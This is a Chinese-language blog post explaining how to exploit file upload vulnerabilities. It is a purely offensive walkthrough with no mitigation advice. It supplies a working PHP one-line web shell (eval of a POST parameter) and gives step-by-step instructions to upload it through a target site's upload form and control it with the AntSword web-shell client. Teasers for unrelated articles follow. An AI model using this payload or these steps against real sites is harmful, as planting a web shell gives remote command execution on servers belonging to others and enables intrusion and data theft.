当前位置:首页 > 每日看点

文件上传漏洞一般会怎么利用?

卡卷网1年前 (2025-05-07)每日看点356

准备知识:

一句话木马:<?php @eval($_POST['cmd']); ?>

木马连接工具如:AntSword(蚁剑)

首先把一句话木马写入到php文件中

文件上传漏洞一般会怎么利用?  第1张

然后找到一个上传文件的地方把php文件上传上去,比如:

文件上传漏洞一般会怎么利用?  第2张

上传木马后找到木马上传的位置

文件上传漏洞一般会怎么利用?  第3张

​编辑 把这个复制粘贴到地址栏里的链接后面,如下:

文件上传漏洞一般会怎么利用?  第4张

按回车

文件上传漏洞一般会怎么利用?  第5张

然后复制链接,打开AntSword,点击add

文件上传漏洞一般会怎么利用?  第6张

然后会弹出个框,在shell url地方粘贴刚才地址栏复制的链接,shell pwd地方输入cmd然后按add即可


文件上传漏洞一般会怎么利用?  第7张

双击刚才添加的

文件上传漏洞一般会怎么利用?  第8张

可以看到木马已经连接上了

文件上传漏洞一般会怎么利用?  第9张

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2025/05/12878.html

分享给朋友:

相关文章

电脑c盘哪些文件可以删除?

电脑c盘哪些文件可以删除?

电脑上的文件夹都是英文,很多朋友都不敢乱删,下面这几个文件夹里的文件,你可以放心删除。 一、可删除的文件1、Backup这是一个备份文件夹,很多装机软件经常会把需要备份的东西,放在这个文件夹中。而当我们需要的软件正常保存之后,这些东西也…

有了Istio,开发还需要微服务架构吗?

有了Istio,开发还需要微服务架构吗?

Istio 是一个开源的服务网格(Service Mesh),通过它可以实现对服务间通信的管理和监控。对于那些本身没有设计为具备安全功能的传统应用程序,Istio 可以提供一个“透明”的安全保护层,而不需要对应用本身进行任何代码修改。…

是什么让你抛弃了 Windows 而转向 Mac?

是什么让你抛弃了 Windows 而转向 Mac?

别的不说,这玩意儿是真抗造啊,我这2012年买的MacBook Pro,依然在用…… 这台电脑我博士最后两年用来写代码(只写不运行,运行要上集群)和写论文,工作之后就变成生活和娱乐了,因为我一直用架子和外接键盘(颈椎不好)所以电脑看…

无人机真的是中国领先吗?

无人机真的是中国领先吗?

巧了这是。 捡到了一台大疆。应该是别人飞丢的。在草丛中泡过水,轴承锈死,电池鼓涨已,经没有维修价值了。但作为玩电子的,免不了要把它解剖,研究一番。那么,我们看看它的国产化率能有多少吧。图片说话: 解释一下吧。…

都是前端框架,为什么用 React 的人会有优越感?

都是前端框架,为什么用 React 的人会有优越感?

上家公司一直搞react,最近第一次写个vue3项目。 老板朋友来了看了下页面说:这用vue写的吧。 我:是... 老板朋友:一看就知道是vue做的。 这tm你看一眼页面就知道用的啥框架? 这感觉就是,我一直用苹果,偶尔用了下华为打电话,有…

PHP承载百万/天 访问量需要用到什么技术?

当年做一个百万PV的商城,也不过是两台2c4g的阿里云虚机罢了(其实一台就够,另外一台主要的逼着大家一定开发的时候一定要有负载均衡和横向扩容的意识)。当时框架还是Thinkphp3.2,框架提高运行效率的开关全打开,标准的lnmp模式,单机…

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。